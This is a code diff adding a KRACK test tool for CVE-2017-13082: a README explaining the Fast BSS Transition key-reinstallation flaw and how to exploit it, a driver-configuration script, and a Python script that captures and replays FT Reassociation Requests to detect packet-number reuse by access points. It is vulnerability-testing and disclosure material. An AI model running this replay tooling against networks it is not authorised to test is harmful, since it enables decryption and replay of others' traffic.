KRACK Attacks: code to test APs for FT attack

README.md

@@ -0,0 +1,61 @@
+This script tests if APs are affected by CVE-2017-13082 (KRACK attack). See [https://www.krackattacks.com](the KRACK attack website for details) and also read [https://papers.mathyvanhoef.com/ccs2017.pdf](the research paper).
+
+# Background on CVE-2017-13082: Key Reinstallation in the Fast BSS Transition (FT) Handshake (802.11r)
+
+Access Points (APs) might contain a vulnerable implementation of the Fast BSS Transition (FT) handshake. More precisely, a retransmitted or replayed FT Reassociation Request may trick the AP into reinstalling the pairwise key. If the AP does not process retransmitted FT reassociation requests, or if it does not reinstall the pairwise key, it is not vulnerable. If it does reinstall the pairwise key, the effect is similar to the attack against the 4-way handshake, expect that the AP instead of the client is now reinstalling a key. More precisely, the AP will subsequently reuse packet numbers when sending frames protected using TKIP, CCMP, or GCMP. This causes nonce reuse, voiding any security these encryption schemes are supposed to provide. Since the packet number is also used as a replay counter for received frames, frames sent *towards* the AP can also be replayed.
+
+In contrast to the 4-way handshake and group key handshake, this is not an attack against the specification. That is, if the state machine as shown in Figure 13-15 of the 802.11-2016 standard is faithfully implemented, the AP will not reinstall the pairwise keys when receiving a retransmitted FT Reassociation Request. However, we found that many APs do process this frame and reinstall the pairwise key.
+
+
+# Script Usage Instructions
+
+We created scripts to determine whether an implementation is vulnerable to any of our attacks. These scripts were tested on Kali Linux. To install the required dependencies on Kali, execute:
+
+	apt-get update
+	apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
+
+Remember to disable Wi-Fi in your network manager before using our scripts. After doing so, execute `sudo rfkill unblock wifi` so our scripts can still use Wi-Fi.
+
+The included Linux script `krack-ft-test.py` can be used to determine if an AP is vulnerable to our attack. The script contains detailed documentation on how to use it:
+
+	./krack-ft-test.py --help
+
+Essentially, it wraps a normal `wpa_supplicant` client, and will keep replaying the FT Reassociation Request (making the AP reinstall the PTK). We tested the script on a Kali Linux distribution using a USB WiFi dongle (a TP-Link WN722N v1).
+
+Remember that this is not an attack script! You require credentials to the network in order to test if an access point is affected by the attack.
+
+**This tool may give incorrectly say an AP is vulnerable to due benign retransmissions of data frames.** However, we are already releasing this code because the script got leaked. Please run this script in an environment with low background noise. Benign retransmissions can be detected in the output of the script: if two data frames have the same `seq` (sequence number), it's a benign retransmission. Example of such a benign retransmission:
+
+	[15:48:47] AP transmitted data using IV=5 (seq=4)
+	[15:48:47] AP transmitted data using IV=5 (seq=4)
+	[15:48:47] IV reuse detected (IV=5, seq=4). AP is vulnerable!
+
+Here there was a benign retransmission of a data frame, because both frames used the same sequence number (`seq`). This wrongly got detected as IV reuse. There is code to fix this ready, but merging those fixes may take some time.
+
+
+# Suggested Solution
+
+If the implementation is vulnerable, the suggested fix is similar to the one of the 4-way handshake. That is, a boolean can be added such that the first FT Reassociation Requests installs the pairwise keys, but any retransmissions will skip key installation. Note that ideally the AP should still send a new FT Reassociation Response, even though it did not reinstall any keys.
+
+
+# Impact and Exploitation Details
+
+Exploiting this vulnerability does not require a man-in-the-middle position! Instead, an adversary merely needs to capture a Fast BSS Transition handshake and save the FT Reassociation Request. Because this frame does not contain a replay counter, the adversary can replay it at any time (and arbitrarily many times). Each time the vulnerable AP receives the replayed frame, the pairwise key will be reinstalled. This attack is illustrated in Figure 9 of the paper.
+
+An adversary can trigger FT handshakes at will as follows. First, if no other AP of the network is within range of the client, the adversary clones a real AP of this network next to the client using a wormhole attack (i.e. we forward all frames over the internet). The adversary then sends a BSS Transition Management Request to the client. This request commands to the client to roam to another AP. As a result, the client will perform an FT handshake to roam to the other AP.
+
+The included network trace [example-ft.pcapng](example-ft.pcapng) is an example of the attack executed against Linux's hostapd. When using the wireshark filter `wlan.sa == 7e:62:5c:7a:cd:47`, notice that packets 779 to 1127 all use the CCMP IV value 1. This was caused by malicious retransmissions of the FT reassociation request.
+
+
+# This project is under a 2-clause BSD license
+
+Copyright 2017 Mathy Vanhoef
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+

disable-hwcrypto.sh

@@ -0,0 +1,37 @@
+#!/bin/bash
+
+# Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
+#
+# This code may be distributed under the terms of the BSD license.
+# See README for more details.
+
+set -e
+
+NOHWCRYPT="ath5k ath9k ath9k_htc rt2800usb carl9170 b43 p54common rt2500usb rt2800pci rt2800usb rt73usb"
+SWCRYPTO="iwlwifi iwl3945 iwl4965"
+HWCRYPTO="ipw2200"
+
+
+# 1. Create nohwcrypt.conf options file
+
+rm /etc/modprobe.d/nohwcrypt.conf 2> /dev/null || true
+
+for MODULE in $NOHWCRYPT
+do echo "options $MODULE nohwcrypt=1" >> /etc/modprobe.d/nohwcrypt.conf; done
+
+for MODULE in $SWCRYPTO
+do echo "options $MODULE swcrypto=1" >> /etc/modprobe.d/nohwcrypt.conf; done
+
+for MODULE in $HWCRYPTO
+do echo "options $MODULE hwcrypto=0" >> /etc/modprobe.d/nohwcrypt.conf; done
+
+
+# 2. Remove loaded modules so they'll reload parameters
+
+for MODULE in $NOHWCRYPT $SWCRYPTO $HWCRYPTO
+do rmmod $MODULE 2> /dev/null || true; done
+
+
+# 3. Done. To be sure parameters are reloaded, reboot computer.
+
+echo "Done. Reboot your computer."

krack-ft-test.py

@@ -0,0 +1,340 @@
+#!/usr/bin/env python2
+
+# Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
+#
+# This code may be distributed under the terms of the BSD license.
+# See README for more details.
+
+import logging
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+from scapy.all import *
+import sys, socket, struct, time, subprocess, atexit, select
+from datetime import datetime
+
+IEEE_TLV_TYPE_RSN = 48
+IEEE_TLV_TYPE_FT  = 55
+
+IEEE80211_RADIOTAP_RATE = (1 << 2)
+IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
+IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
+IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
+
+#TODO: - !!! Detect retransmissions based on packet time and sequence counter (see client tests) !!!
+#TODO: - Merge code with client tests to avoid code duplication (including some error handling)
+#TODO: - Detect new EAPOL handshake or normal association frames (reset state and stop replaying)
+#TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
+#TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
+#TODO: - Execute rfkill unblock wifi because some will forget this
+
+# FIXME: We are repeating the "disable hw encryption" script to client tests
+USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP
+
+To test wheter an AP is vulnerable to a Key Reinstallation Attack against
+the Fast BSS Transition (FT) handshake, take the following steps:
+
+1. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
+   with our script. So disable hardware encryption by executing:
+
+      ./disable-hwcrypto.sh
+
+   This only needs to be done once. It's recommended to reboot after executing
+   this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
+   or similar to confirm the nohwcript/.. param has been set. We tested this
+   with an a TP-Link TL-WN722N and an Alfa AWUS051NH v2.
+
+2. Create a wpa_supplicant configuration file that can be used to connect
+   to the network. A basic example is:
+
+      ctrl_interface=/var/run/wpa_supplicant
+      network={{
+          ssid="testnet"
+          key_mgmt=FT-PSK
+          psk="password"
+      }}
+
+   Note the use of "FT-PSK". Save it as network.conf or similar. For more
+   info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf
+
+3. Try to connect to the network using your platform's wpa_supplicant.
+   This will likely require a command such as:
+
+      sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
+
+   If this fails, either the AP does not support FT, or you provided the wrong
+   network configuration options in step 1.
+
+4. Use this script as a wrapper over the previous wpa_supplicant command:
+
+      sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf
+
+   This will execute the wpa_supplicant command using the provided parameters,
+   and will add a virtual monitor interface that will perform attack tests.
+
+5. Use wpa_cli to roam to a different AP of the same network. For example:
+
+      sudo wpa_cli -i wlan0
+      > status
+      bssid=c4:e9:84:db:fb:7b
+      ssid=testnet
+      ...
+      > scan_results 
+      bssid / frequency / signal level / flags / ssid
+      c4:e9:84:db:fb:7b	2412  -21  [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
+      c4:e9:84:1d:a5:bc	2412  -31  [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
+      ...
+      > roam c4:e9:84:1d:a5:bc
+      ...
+   
+   In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
+   status command). The scan_results command shows this network also has a
+   second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.
+
+6. Generate traffic between the AP and client. For example:
+
+      sudo arping -I wlan0 192.168.1.10
+
+7. Now look at the output of {name} to see if the AP is vulnerable.
+
+   6a. First it should say "Detected FT reassociation frame". Then it will
+       start replaying this frame to try the attack.
+   6b. The script shows which IVs (= packet numbers) the AP is using when
+       sending data frames.
+   6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
+       we confirmed it's vulnerable.
+
+  !! Be sure to manually check network traces as well, to confirm this script
+  !! is replaying the reassociation request properly, and to manually confirm
+  !! whether there is IV (= packet number) reuse or not.
+
+   Example output of vulnerable AP:
+      [15:59:24] Replaying Reassociation Request
+      [15:59:25] AP transmitted data using IV=1 (seq=0)
+      [15:59:25] Replaying Reassociation Request
+      [15:59:26] AP transmitted data using IV=1 (seq=0)
+      [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!
+
+   Example output of patched AP (note that IVs are never reused):
+      [16:00:49] Replaying Reassociation Request
+      [16:00:49] AP transmitted data using IV=1 (seq=0)
+      [16:00:50] AP transmitted data using IV=2 (seq=1)
+      [16:00:50] Replaying Reassociation Request
+      [16:00:51] AP transmitted data using IV=3 (seq=2)
+      [16:00:51] Replaying Reassociation Request
+      [16:00:52] AP transmitted data using IV=4 (seq=3)
+"""
+
+#### Basic output and logging functionality ####
+
+ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
+COLORCODES = { "gray"  : "\033[0;37m",
+               "green" : "\033[0;32m",
+               "orange": "\033[0;33m",
+               "red"   : "\033[0;31m" }
+
+global_log_level = INFO
+def log(level, msg, color=None, showtime=True):
+	if level < global_log_level: return
+	if level == DEBUG   and color is None: color="gray"
+	if level == WARNING and color is None: color="orange"
+	if level == ERROR   and color is None: color="red"
+	print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
+
+
+#### Packet Processing Functions ####
+
+class MitmSocket(L2Socket):
+	def __init__(self, **kwargs):
+		super(MitmSocket, self).__init__(**kwargs)
+
+	def send(self, p):
+		# Hack: set the More Data flag so we can detect injected frames (and so clients stay awake longer)
+		p[Dot11].FCfield |= 0x20
+		L2Socket.send(self, RadioTap()/p)
+
+	def _strip_fcs(self, p):
+		# Scapy can't handle the optional Frame Check Sequence (FCS) field automatically
+		if p[RadioTap].present & 2 != 0:
+			rawframe = str(p[RadioTap])
+			pos = 8
+			while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
+		
+			# If the TSFT field is present, it must be 8-bytes aligned
+			if p[RadioTap].present & 1 != 0:
+				pos += (8 - (pos % 8))
+				pos += 8
+
+			# Remove FCS if present
+			if ord(rawframe[pos]) & 0x10 != 0:
+				return Dot11(str(p[Dot11])[:-4])
+
+		return p[Dot11]
+
+	def recv(self, x=MTU):
+		p = L2Socket.recv(self, x)
+		if p == None or not Dot11 in p: return None
+
+		# Hack: ignore frames that we just injected and are echoed back by the kernel
+		if p[Dot11].FCfield & 0x20 != 0:
+			return None
+
+		# Strip the FCS if present, and drop the RadioTap header
+		return self._strip_fcs(p)
+
+	def close(self):
+		super(MitmSocket, self).close()
+
+def dot11_get_seqnum(p):
+	return p[Dot11].SC >> 4
+
+def dot11_get_iv(p):
+	"""Scapy can't handle Extended IVs, so do this properly ourselves (only works for CCMP)"""
+	if Dot11WEP not in p:
+		log(ERROR, "INTERNAL ERROR: Requested IV of plaintext frame")
+		return 0
+
+	wep = p[Dot11WEP]
+	if wep.keyid & 32:
+		return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[:4])[0] << 16)
+	else:
+		return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)
+
+def get_tlv_value(p, type):
+	if not Dot11Elt in p: return None
+	el = p[Dot11Elt]
+	while isinstance(el, Dot11Elt):
+		if el.ID == type:
+			return el.info
+		el = el.payload
+	return None
+
+
+#### Man-in-the-middle Code ####
+
+class KRAckAttackFt():
+	def __init__(self, interface):
+		self.nic_iface = interface
+		self.nic_mon = interface + "mon"
+		self.clientmac = scapy.arch.get_if_hwaddr(interface)
+
+		self.sock  = None
+		self.wpasupp = None
+		self.reassoc = None
+		self.ivs = set()
+		self.next_replay = None
+
+	def handle_rx(self):
+		p = self.sock.recv()
+		if p == None: return
+
+		# Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
+		# header of the (now decrypted) frame.
+		# FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
+		if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
+			# If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
+			payload = str(p[Dot11WEP])
+
+			# Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
+			# *not* the header of a plaintext EAPOL handshake frame
+			if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
+				log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
+				log(ERROR, "   Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
+				quit(1)
+
+
+		if p.addr2 == self.clientmac and Dot11ReassoReq in p:
+			if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
+				log(INFO, "Detected FT reassociation frame")
+				self.reassoc = p
+				self.next_replay = time.time() + 1
+			else:
+				log(INFO, "Reassociation frame does not appear to be an FT one")
+				self.reassoc = None
+			self.ivs = set()
+
+		elif p.addr2 == self.clientmac and Dot11AssoReq in p:
+			log(INFO, "Detected normal association frame")
+			self.reassoc = None
+			self.ivs = set()
+
+		elif p.addr1 == self.clientmac and Dot11WEP in p:
+			iv = dot11_get_iv(p)
+			log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
+
+			# FIXME: When the client disconnects (or reconnects), clear the set of used IVs
+			if iv in self.ivs:
+				log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
+					"AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
+
+			self.ivs.add(iv)
+
+	def configure_interfaces(self):
+		log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
+
+		# 1. Remove unused virtual interfaces to start from a clean state
+		subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
+
+		# 2. Configure monitor mode on interfaces
+		subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
+		# Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
+		# sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
+		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
+		time.sleep(0.5)
+		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
+		subprocess.check_output(["ifconfig", self.nic_mon, "up"])
+
+	def run(self):
+		self.configure_interfaces()
+
+		self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
+
+		# Open the wpa_supplicant client that will connect to the network that will be tested
+		self.wpasupp = subprocess.Popen(sys.argv[1:])
+
+		# Monitor the virtual monitor interface of the client and perform the needed actions
+		while True:
+			sel = select.select([self.sock], [], [], 1)
+			if self.sock in sel[0]: self.handle_rx()
+
+			if self.reassoc and time.time() > self.next_replay:
+				log(INFO, "Replaying Reassociation Request")
+				self.sock.send(self.reassoc)
+				self.next_replay = time.time() + 1
+
+	def stop(self):
+		log(STATUS, "Closing wpa_supplicant and cleaning up ...")
+		if self.wpasupp:
+			self.wpasupp.terminate()
+			self.wpasupp.wait()
+		if self.sock: self.sock.close()
+
+
+def cleanup():
+	attack.stop()
+
+def argv_get_interface():
+	for i in range(len(sys.argv)):
+		if not sys.argv[i].startswith("-i"):
+			continue
+		if len(sys.argv[i]) > 2:
+			return sys.argv[i][2:]
+		else:
+			return sys.argv[i + 1]
+
+	return None
+
+if __name__ == "__main__":
+	if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
+		print USAGE.format(name=sys.argv[0])
+		quit(1)
+
+	# TODO: Verify that we only accept CCMP?
+	interface = argv_get_interface()
+	if not interface:
+		log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
+		quit(1)
+
+	attack = KRAckAttackFt(interface)
+	atexit.register(cleanup)
+	attack.run()
+
+